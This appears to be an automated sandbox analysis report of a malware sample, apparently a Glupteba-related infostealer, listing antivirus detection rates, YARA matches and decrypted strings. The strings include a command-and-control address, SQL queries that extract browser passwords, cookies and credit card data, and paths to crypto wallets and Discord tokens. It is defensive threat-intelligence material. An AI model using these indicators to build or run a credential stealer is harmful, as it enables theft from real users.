                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exeReversingLabs: Detection: 29%
                        Source: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exeReversingLabs: Detection: 16%
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 57%
                        Yara detected Glupteba
                        Source: Yara matchFile source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: INSERT_KEY_HERE
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetProcAddress
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: LoadLibraryA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: lstrcatA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: OpenEventA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateEventA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CloseHandle
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Sleep
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetUserDefaultLangID
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VirtualAllocExNuma
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VirtualFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetSystemInfo
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VirtualAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HeapAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetComputerNameA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: lstrcpyA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetProcessHeap
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetCurrentProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: lstrlenA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ExitProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetSystemTime
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SystemTimeToFileTime
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: advapi32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: gdi32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: user32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: crypt32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ntdll.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetUserNameA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateDCA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetDeviceCaps
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ReleaseDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptStringToBinaryA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sscanf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VMwareVMware
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HAL9TH
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: JohnDoe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DISPLAY
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %hu/%hu/%hu
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: http://185.172.128.76
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /15f649199f40275b/
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: default10
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetEnvironmentVariableA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileAttributesA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalLock
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HeapFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: IsWow64Process
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process32Next
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLocalTime
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FreeLibrary
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetTimeZoneInformation
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetSystemPowerStatus
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetVolumeInformationA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetWindowsDirectoryA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process32First
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLocaleInfoA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetModuleFileNameA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DeleteFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindNextFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: LocalFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindClose
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SetEnvironmentVariableA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: LocalAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileSizeEx
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ReadFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SetFilePointer
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: WriteFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindFirstFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CopyFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VirtualProtect
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLastError
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: lstrcpynA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: MultiByteToWideChar
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: WideCharToMultiByte
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: OpenProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: TerminateProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetCurrentProcessId
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: gdiplus.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ole32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: bcrypt.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wininet.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: shlwapi.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: shell32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: psapi.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: rstrtmgr.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateCompatibleBitmap
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SelectObject
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BitBlt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DeleteObject
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateCompatibleDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipGetImageEncodersSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipGetImageEncoders
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdiplusStartup
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdiplusShutdown
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipSaveImageToStream
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipDisposeImage
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetHGlobalFromStream
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateStreamOnHGlobal
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoUninitialize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoInitialize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoCreateInstance
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptDecrypt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptSetProperty
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptDestroyKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetWindowRect
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetDesktopWindow
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CloseWindow
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wsprintfA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: EnumDisplayDevicesA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetKeyboardLayoutList
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CharToOemW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wsprintfW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegQueryValueExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegEnumKeyExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegOpenKeyExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegCloseKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegEnumValueA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptBinaryToStringA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptUnprotectData
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SHGetFolderPathA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ShellExecuteExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetOpenUrlA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetConnectA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetCloseHandle
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetOpenA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HttpSendRequestA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HttpOpenRequestA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetReadFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetCrackUrlA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrCmpCA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrStrA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrCmpCW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PathMatchSpecA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetModuleFileNameExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmStartSession
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmRegisterResources
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmGetList
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmEndSession
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_open
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_prepare_v2
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_step
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_text
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_finalize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_close
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_bytes
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_blob
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encrypted_key
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PATH
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: NSS_Init
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: NSS_Shutdown
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_GetInternalKeySlot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_FreeSlot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_Authenticate
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11SDR_Decrypt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: C:\ProgramData\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: browser:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: profile:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: url:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: login:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: password:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: OperaGX
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Network
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: .txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: TRUE
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FALSE
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: autofill
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT name, value FROM autofill
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: history
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: name:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: month:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: year:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: card:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Login Data
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Web Data
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: History
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: logins.json
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: formSubmitURL
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: usernameField
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encryptedUsername
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encryptedPassword
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: guid
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: cookies.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: formhistory.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: places.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: plugins
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Local Extension Settings
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Sync Extension Settings
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: IndexedDB
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera Stable
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera GX Stable
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CURRENT
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: chrome-extension_
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: _0.indexeddb.leveldb
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Local State
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: profiles.ini
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: chrome
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: opera
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: firefox
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wallets
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %08lX%04lX%lu
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ProductName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ProcessorNameString
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DisplayName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DisplayVersion
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Network Info:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - IP: IP?
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Country: ISO?
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: System Summary:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - HWID:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - OS:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Architecture:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - UserName:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Computer Name:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Local Time:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - UTC:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Language:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Keyboards:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Laptop:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Running Path:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - CPU:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Threads:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Cores:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - RAM:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Display Resolution:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - GPU:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: User Agents:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Installed Apps:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: All Users:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Current User:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process List:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: system_info.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: freebl3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: mozglue.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: msvcp140.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: nss3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: softokn3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: vcruntime140.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Temp\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: .exe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: runas
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: open
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /c start
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %DESKTOP%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %APPDATA%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %LOCALAPPDATA%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %USERPROFILE%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %DOCUMENTS%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %PROGRAMFILES%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %PROGRAMFILES_86%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %RECENT%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.lnk
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: files
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \discord\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
